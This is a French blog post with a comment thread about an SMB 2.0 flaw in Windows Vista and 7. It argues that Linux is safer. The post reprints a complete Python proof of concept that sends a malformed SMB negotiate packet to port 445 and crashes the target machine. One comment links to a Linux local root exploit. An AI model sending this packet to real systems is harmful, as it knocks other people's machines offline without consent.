Une faille Windows Vista et Seven aberrante
Ho que c'est bon quand on est Linuxien ou Maceux et qu'on entend ce genre de choses ! C'est Nicolas Kandel, un collègue de boulot, qui vient de me parler de ça. Une faille sur Vista et Windows Seven sur le protocole SMB 2.0 (vous savez, le partage de dossier) qui permet à quiconque sur le réseau local de planter votre machine. Et ce avec un simple script python de 7 lignes !!!
Oui, 7 lignes... La page qui parle de ça se trouve ici http://seclists.org/fulldisclosure/2009/Sep/0039.html. 7 lignes de python (en fait un peu plus car le paquet envoyé est mise en forme pour être plus lisible) et voilà que le Vista ciblé vous présente un écran bleu (la tradition est importante chez Microsoft) et un redémarrage s'impose.
Le pire dans tout cela, c'est que vous, utilisateur de Vista ou Seven, n'y pouvez rien :) oui je souris, désolé.
Alors pour vous, voici le script:
#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleep
host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
Si vous lisez le commentaire au début de script, vous allez comprendre... en fait l'attaquant place un "&" à la place de "0" dans l'ID de processus.
Sachant que la durée de vie d'un PC sans protection sur internet est de 4 minutes et voyant ce genre de faille... je suis heureux de ne pas avoir de Windows depuis plus de 9 ans.
Alors quand vous en aurez marre de voir ce genre d'aberration, passez à Linux: Fedora, Ubuntu, ou encore http://www.debian.org/index.fr.html. Et pour ceux qui veulent autre chose que Linux, pensez à FreeBSD ou OpenBSD qui sont eux aussi des Unix.
Bref, pour ma part, je me conforte jour après jour de mon choix ! A vous de jouer !
Trackbacks
Pour ajouter un trackback (retrolien) sur ce ticket, utilisez cette adresse: http://www.metal3d.org/index.php/trackback/default/tb?id=blog%2F229
Salut,
En effet, rien n'est moins sécurisé que windows, mais bon, dans l'espoir que cette faille puisse être colmater un jour, ...
Pour ma part je louche plus sur les systèmes mac que linux, une préférence esthétique, peut être, ou de simplicité d'utilisation, même si j'ai travaillé 3 ans avec un bon debian et un e16 sans soucis (avec quelques moultes petites applis et softs sympa, genre blender ;) ).
Mais le prix me fait encore réfléchir, surtout que je suis pluridisciplinaire, bon, c'est mon boulot qui veut ça, et je devrais débourser un max pour le hard, autant que pour le soft.
c'est dommage de taunt sans trop chercher... au moment ou tu publiait ton blog, 7 était patché. Les failles existent sur tous les OS. Ce n'est pas une spécificité de windows. Ce genre d'"aberration", tu en trouve sous linux, sur mac (tient, le coup du bug qui supprime le profil, c'est pas énorme ça ? tu n'en parle pas ? )
Là ou windows pêche c'est dans la vitesse de correction de ses failles. Bien qu'ils se soient améliorés, ils sont encore loin de la réactivité du monde libre la dessus. (Je parle même pas de la transparence)
Pour ce qui est de cette faille, le plus amusant, c'est que c'est un patch de sécurité qui l'a créé.
Bref, ça manque de lucidité et de recul, tout ça, dommage.
houlla houlla, pas d'amalgame cher Mitsu !
En premier lieu, je parle pas de bug mais de faille, tu me diras "il n'y a qu'un pas" mais je précise que le bug implique une erreur logiciel qui impact un fonctionnement, et ça des bugs y'en a et y'en aura dans tout OS.
Par contre une faille laisse libre court à un attaquant de pourrir un système. Là par contre, Windows n'est pas à la bourre, il est carrément à la rue. Avoue que les Unix ont largement moins de souci de ce genre que les Windows.
Ok, un patch est tombé alors que je rédigeai le post, mais cela n'empêche pas que cette faille date de pas mal de temps et comme tu le précise, M$ à mis du temps (comme d'habitude) à réparer cette crasse.
Là où je ne te suis pas, c'est sur ma lucidité. Après pas mal de temps passé dans le monde de l'informatique, je n'ai de cesse que de voir et entendre des nouvelles presques tous les mois sur une faille découverte, un bug ancestral jamais réparé, ou encore des super virus de la mort... je ne fais que rapporter une news parmis des centaines qui tombent régulièrement. Ce n'est pas un taunt trollé mais un exemple de ce que risque un utilisateur mal informé.
Du recul, j'en prend. Mais force est de constater que (bon sang) on ne trouve pas autant de conneries de ce genre sur les systèmes Unix. On en trouve, mais pas avec cette fréquence ni cette récurrence.
Bref, ce post était aussi là pour présenter l'autre lien, à lire, qui montre la faiblesse de Windows (4 minutes de vie si pas de protection). Je trouve que c'est dommage de vouloir défendre l'indéfendable :)
PS: Je parle de Unix en incluant Linux dedans, certains hurleront "Unix Like" mais nous sommes de plus en plus à penser que Linux, comme tout Unix actuel, est autant Unix que les autres... Je m'expliquerai bientôt dans un autre post sur ce sujet et vous pourrez en discuter avec moi.
Re ^^
Alors, pour reprendre ce que je disais, c'est que des failles plus ou moins grosses sous linux, ça existe. Tu conseille debian par exemple, distrib orientée justement sur la fiabilité plutôt que la nouveauté. ça ne les a pourtant pas empêchés de créer une énorme faille dans SSL en voulant justement en corriger une - qui n'en était pas. Tout un tas de noyau, jusqu'au 2.6.30.4 avaient une faille permettant facilement d'obtenir les droits root pour peu qu'on dispose d'une connexion locale. A mon avis pas mal de serveurs d'hebergements sont concernés... La preuve, je bosse sur un serveur avec un noyau 2.6.26 ... bon, je suis root dessus, mais pour les mutualisés avec acces ssh, y'a surement de quoi s'amuser. (cf http://www.tux-planet.fr/linux-kernel-2-x-sock_sendpage-local-root-exploit/ )
Bref, de bonnes grosses failles bien grasse, ça existe de partout, c'est pas une spécificité windows, c'est pas plus une "abhération" que la modification d'un algo de sécurité parce qu'il fait des warning à la compilation (modif qui rende casse l'aléatoire de l'algo au passage, youpi.
Pour ce qui est du site la durée de vie d'un pc, blabla. Si on va voir comment il calcul ça, il écoute les attaques, dès qu'il en reçoit une, il se considère comme vérolé. Alors ok, si tu installe aujourd'hui un windows XP sans aucun service pack (ça se trouve encore, ça ? ) et en n'ayant pas une box qui te sert de routeur et bloquant directement ce genre d'attaque.... Alors oui, dans ce cas, tu va te faire infecter en 4 mn.
Ce n'est pas parce qu'il y a un grand nombre de PC zombi qui spament des attaques que la durée de vie d'un PC sur le net baisse. Je ne suis absolument pas d'accord avec ce raisonnement, complètement biaisé.
Par contre si tu prends - logiquement - le dernier OS de microsoft, il vérifie si il à des mise à jour à faire lors de l'installation, possède un firewall (Ahah ^^' ) et n'est pas forcement vulnérable aux attaques détectée par ce site. Tu as des mises à jours de sécurité très régulièrement, et un mode de sécurité infâme vu que sous windows, pendant longtemps, si tu n'était pas admin de ta machine, tu ne pouvait rien faire (mais genre même pas lancer une appli, vive les progs a la con) donc maintenant, quand tu es admin, tu as en plus une surcouche qui te demande validation pour toutes les action d'administration. Bref, niveau sécurité Microsoft ne sont plus autant à la rue que tu le laisse croire, ni qu'ils étaient il y'à quelques années.
Le réel problème du système de microsoft c'est qu'il est propriétaire et fermé, même si ces derniers temps MS fait de quelques pas tremblant dans le libre . On peut aussi critiquer leur politique monopolistique...
Pointer du doigt une faille d'un niveau relativement faible, point de vue sécurité (réseau local, ne fait que planter la machine...) en parlant d'absurdité (comme si ce n'était pas quelque chose de courant, les failles, sur les OS) et en citant une analyse de la durée de vie d'un PC en tenant leur raisonnement pour objectif... voilà ce que j'appelle ton manque de lucidité pour le coup, vu que ton billet est un gros troll velu. :D
Ha non non non et non !!!
La faille est pas "faible" puisqu'elle plante littéralement le PC... ou alors on a une sacré différence de dosage niveau "sécu"...
je n'ai JAMAIS dit que Linux ou Mac n'avait pas de faille, la preuve avec un message d'il y a pas plus de 2 semaines qui parlait d'un exploit possible sur les 2.6.29...
Grosse différence, c'est l'accès à la faille. Là, on parle quand même d'un protocole ouvert par défaut sur Windows, buggé depuis pas mal de version, et surtout, désolé, mais valable jusqu'au Windows 7 et ce 3 mois après sa sortie !!!
Oui, il y a des XP sans SP étant donné que le SP3 plantait la plupart des postes XP sitôt la MAJ faite... Beaucoup ont arrêté les MAJ auto de peur de revoir son poste planter. Autre option, on veut pas de IE 8... à cause des clients tout ça tout ça et tout... et hop on évite les SP (si si...)
4 minutes, c'est "sans rien faire", moyenne calculé par 3 labos (je retrouve pu les liens)... et firewall en fonction ! Juste IE ouvert !
Alors je répète: "pas d'amalgame", je ne dis pas du tout que Linux c'est le master of the iron armor et tout, non ! je dis que t'as certainement moins de chance de te faire polluer. La raison tu la donnes parfaitement: système basé sur de l'open source librement exploitable, modifiable etc...
Ne vient pas, toi celui qui m'a montré linux, me dire le contraire... et jouer les avocats du diable... :)
Troll: NON et NON encore ! Je n'invente rien, je rapporte un fait ! Fait avéré, vu et revu, au milieu d'un tas de saloperies déjà mise à jour sur cet OS mal foutu qu'est Windows Vista et ses poursuivant (enfin... son poursuivant: 7)
Maintenant, si tu me trouves un script python aussi simple qui me plante mon poste sur le réseau local, sans mot de passe ni accès root, je viens m'abaisser à tes pieds et t'embrasser les gros orteils